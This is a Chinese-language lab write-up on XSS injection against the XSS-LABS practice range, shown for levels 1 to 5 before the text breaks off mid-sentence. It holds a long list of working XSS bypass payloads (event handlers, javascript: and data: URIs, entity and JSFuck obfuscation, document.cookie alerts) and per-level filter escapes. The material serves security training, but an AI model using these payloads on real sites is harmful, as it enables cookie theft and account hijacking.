XSS注入练习篇1-13关 一

@[TOC]XSS注入练习(靶场闯关)

一.常用标签处理

level1所有bypass
<script>alert(1)</script>
<script>confirm('1')</script>
<script>alert(1)</script>
<script>alert(/1/zyl)</script>
<script>alert(document.cookie)</script>
jsfuck.com
<script>alert([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]([+!+[]]+[])())</script>
<script>alert(String.fromCharCode(65))</script>
<ZYL/onclick="alert('xss')">ZYL
<script zyl>alert('xss')</script>
<a href="javascript:alert('xss')">aaa</a>
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==>
<a href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>ZYL
<a href=j&#x61;v&#97script&#x3A;&#97lert(13)>ZYL
<img src=1 onerror="alert('xss')">
<img src=1 onerror=alert(document.cookie)>
<svg onload=alert(1)>
<video src=1 onerror=alert(1)>
<img/src=1/onerror="alert(/xss/)">
<img/src=1/onerror=alert(/xss/)>
<button onfocus=alert(1) autofocus>
<body onload=alert(1)>
<body background="javascript:alert('XSS')">
<iframe src="javascript:alert('1')"></iframe>
<iframe onload=alert(1)></iframe>
<input onfocus=alert(1) autofocus>
<input type="image" src="javascript:alert('XSS');">

常用测试脚本
<script>alert(1)</script>
<svg onload=alert(1)>
<img src=1 onerror="alert('1')">

关于长度:长度限制一直以来是限制XSS注入的一种方案,一旦长度不符合,XSS注入将彻底失去意义,因为根本不可能执行带有攻击性的JS代码。故,在测试时我们常常以短小的JS代码起手

二.XSS-LABS

1.level 1

本关未开启任何限制

<script>alert(1)</script>

判断回显位置:
XSS注入练习篇1-13关 一_第1张图片
插入:
XSS注入练习篇1-13关 一_第2张图片

2.level 2 双引号闭合

看过滤机制,回显位置
XSS注入练习篇1-13关 一_第3张图片
回显在input标签内部,尝试构造双引号闭合,逃逸出来

"><script>alert(1)</script>//

XSS注入练习篇1-13关 一_第4张图片

3.level 3源码函数书写不全,单引号绕过

继续短payload起手,查看回显位置和过滤机制,与第二关相似
XSS注入练习篇1-13关 一_第5张图片
无法进行,作弊查看源代码
XSS注入练习篇1-13关 一_第6张图片
htmlspecialchars:用于字符转换的函数,用于过滤,这是转换的设置
XSS注入练习篇1-13关 一_第7张图片
XSS注入练习篇1-13关 一_第8张图片

XSS注入练习篇1-13关 一_第9张图片

4.level 4 无尖括号绕过

测试:
XSS注入练习篇1-13关 一_第10张图片
我们的左右括号被绕过,尝试不使用尖括号进行绕过:

"onclick=alert(1) v

XSS注入练习篇1-13关 一_第11张图片

5.level 5 a标签的使用

输出点:
XSS注入练习篇1-13关 一_第12张图片
感觉是替换防御,对

你可能感兴趣的:(安全,xss,javascript,前端)